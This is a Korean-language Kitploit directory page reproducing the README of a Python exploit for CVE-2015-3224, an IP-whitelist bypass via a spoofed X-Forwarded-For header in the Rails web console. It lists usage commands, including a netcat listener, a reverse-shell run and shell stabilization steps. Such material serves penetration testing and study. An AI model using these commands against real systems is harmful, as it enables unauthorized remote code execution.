Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2015-3224 — Ruby on Rails Web Console 익스플로잇 (CVE-2015-3224) | Kitploit
도구/GitHubGitHub/sic4rio/cve-2015-3224
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Ruby on Rails Web Console 익스플로잇 (CVE-2015-3224)

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Ruby on Rails 웹 콘솔 익스플로잇 (CVE-2015-3224)

CVE-2015-3224

이 저장소는 Ruby on Rails 4.0.x 및 4.1.x 개발자 웹 콘솔의 IP 화이트리스트 우회 취약점을 익스플로잇하는 Python 스크립트를 포함합니다. 이 스크립트는 취약한 서버에서 원격 코드 실행을 가능하게 합니다.

⚠️ 면책 조항 이 스크립트는 교육 목적 및 공인된 보안 테스트 용도로만 사용하세요. 명시적 허가 없이 어떤 시스템에서도 사용하지 마십시오. 저자는 이 스크립트로 인한 오용 또는 손해에 대해 책임지지 않습니다.


📌 취약점 설명

취약한 버전의 Ruby on Rails 웹 콘솔은 개발 목적으로 설계되었으며 신뢰할 수 있는 IP 주소에서만 접근해야 합니다. 그러나 X-Forwarded-For HTTP 헤더의 부적절한 처리로 인해 공격자는 IP 주소를 스푸핑하여 신뢰할 수 있는 로컬 사용자(예: 127.0.0.1 또는 ::1)로 가장할 수 있습니다. 이로써 IP 화이트리스트를 우회하고 웹 콘솔에 무단 액세스하여 원격 코드 실행이 가능해집니다.


🚀 기능

  • 사용하기 쉬움: 간단한 명령줄 인터페이스.
  • 동적 경로 탐색: 대상 서버를 자동으로 스캔하여 동적 콘솔 세션 경로를 찾습니다.
  • 두 가지 셸 모드:
    • 간단한 셸: 빠른 명령 실행을 위한 기본적인 비대화형 셸.
    • 리버스 TTY 셸: 완전한 대화형 PTY 리버스 셸을 얻기 위한 한 줄 명령.
  • 가독성 향상: 상태 메시지, 성공 및 오류에 색상으로 구분된 출력.
  • 견고함: 네트워크 문제 및 실패한 명령에 대한 오류 처리를 포함합니다.

✅ 요구 사항

  • Python 3
  • requests 라이브러리

requests 설치:

root@kitploit:~
pip install requests

⚙️ 사용법

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <repo-directory>
    
  2. 스크립트를 실행 가능하게 만듭니다:

    root@kitploit:~
    chmod +x exploit.py
    

옵션 1: 간단한 대화형 셸

이 모드는 빠르고 간단한 명령을 실행할 때 유용합니다.

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT>

옵션 2: 전체 대화형 TTY (리버스 셸)

이 모드는 안정적이고 완전한 대화형 셸을 위한 권장 모드입니다.

1단계: 리스너 시작

로컬 머신에서 새 터미널을 열고 netcat 리스너를 시작합니다.

root@kitploit:~
nc -lvnp 9001

2단계: 익스플로잇 실행

다른 터미널에서 --rev-shell 플래그와 함께 로컬 IP(lhost) 및 포트(lport)를 지정하여 스크립트를 실행합니다.

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001

3단계: 셸 안정화

netcat 리스너에 연결이 도착합니다. 이를 완전한 대화형 TTY로 업그레이드하려면 netcat 창에서 다음 단계를 따르세요:

  1. Ctrl+Z를 눌러 셸을 백그라운드로 보냅니다.
  2. 로컬 터미널을 raw 모드로 설정하고 셸을 포그라운드로 가져옵니다.
    root@kitploit:~
    stty raw -echo; fg
    
    프롬프트가 다시 나타나지 않으면 Enter를 누르세요.
  3. 원격 셸에서 터미널 속성을 설정합니다.
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

이제 완전하고 안정적인 셸을 사용할 수 있습니다!


👥 크레딧

  • 원본 익스플로잇: Eval (@0xEval)
  • Readme.md 파일: GPT
도구 다운로드